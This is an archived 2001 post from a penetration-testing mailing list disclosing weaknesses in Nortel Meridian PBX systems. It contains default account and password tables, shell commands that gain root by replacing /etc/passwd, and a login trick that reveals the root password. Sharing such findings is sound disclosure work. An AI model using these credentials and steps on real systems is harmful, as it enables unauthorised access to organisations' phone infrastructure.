Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Penetration Testing: Re: Nortel Security

Re: Nortel Security

From: Mark Rowe <mark_at_whatnot.demon.co.uk>
Date: Tue, 10 Jul 2001 12:17:08 +0100

In article <01063012540504.01490_at_sliver>, H D Moore
<hdm_at_secureaustin.com> writes

I came across this while doing a security review 3 years ago. I tried to
contact Nortel several times but never received a response. I guess they
don't think it is important :-o

>If the PBX is hooked into the actual network, there are quite a few ways to
>get access to the system. The easiest method is to tftp the /etc/passwd file
>off the system and crack the hashes. If you go this route, you will get a
>user account called "service" with a password of "smile" ;) If you log into
>the system with this account, you will notice that /etc is mode 0777, so
>getting root access is trivial:
>
>$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
>$ mv /etc/passwd /etc/passwd.bak
>$ mv /etc/mah_passwd /etc/passwd
>$ su root
># mv /etc/passwd.bak /etc/passwd
>
>I don't remember which version of this system it was, but the client software
>that came with it was called "Meridian Terminal Emulator". You could manage
>the PBX with this by first logging in with 0000/0000 then giving it the
>manager password of "9999". I really wish I had more time to write up the
>stuff I find out there...
>
>-HD
>

Anyway I think the service account exists on the MAX,CCR and Link
Meridian components.

Here are some other stuff I came across,

Accounts that give UNIX level access
====================================

Box Account Password Use
MAX,CCR,Link service smile General engineer account
CCR,Link disttech 4tas Engineer account
MAX root 3ep5w2u Root

Accounts that give application level access
===========================================

Box Account Password Use
MAX maint ntacdmax Maintenance account
CCR, Link maint maint Maintenance account
CCR ccrusr ccrusr User account
Link mlusr mlusr User account

To gain root access on Link or CCR -

Login as disttech/4tas

type "showpwd"

at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow
(e.g. if today is Tuesday enter "MonWed" - note the capitalisation).

When you are told this is invalid, enter the same thing again.

The root password is now displayed in plain text on the screen. You can
now "su" to root with this password.

To gain access to the Meridian itself - there are two methods of access
depending how the switch is set up. Try password only first as most
will probably be set up like this -

Password only
enter
logi 0000 (customer level)
logi 1111 (a bit higher)
logi 8429 (maintence)

Username and password
logi customer
PASS? 0000

logi admin1
PASS? 1111

logi to
PASS? 8429

Hope this helps,
Mark.
 
  

-- 
Mark Rowe
IT Security Consultant
--------------------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
For more information on SecurityFocus' SIA service which automatically alerts you to 
the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Received on Jul 10 2001
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos